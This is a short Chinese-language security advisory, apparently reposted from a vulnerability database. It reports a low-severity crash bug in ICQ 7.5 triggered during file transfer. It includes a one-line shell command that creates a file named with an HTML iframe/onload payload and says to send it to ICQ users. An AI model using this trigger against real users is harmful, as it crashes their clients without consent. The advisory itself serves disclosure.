漏洞起因
异常条件处理失败错误
危险等级
低
影响系统
ICQ Inc. ICQ 7.5
不受影响系统
危害
远程攻击者可利用此漏洞使应用程序崩溃。
攻击所需条件
攻击者必须构建恶意文件,发送给ICQ用户。
漏洞信息
ICQ是一款流行的即时信息聊天工具。
由于缺少输入校验,输出过滤,错误的文件类型和文件名在文件传送过程中可导致ICQ崩溃。如下的文件和负载可用于触发描述的漏洞:
— SNIP —
sh3ll$ echo "0" > \<iframe src\=\"icq.com\"\ onload\=alert\(‘0x90’\)\>.rtf
— SNIP —
攻击者把此文件发送给ICQ客户端即可。
测试方法
厂商解决方案
目前没有详细解决方案提供:
http://www.icq.com/
漏洞提供者
noptrix
漏洞消息链接
http://www.noptrix.net/advisories/icq_dos.txt
0 条评论。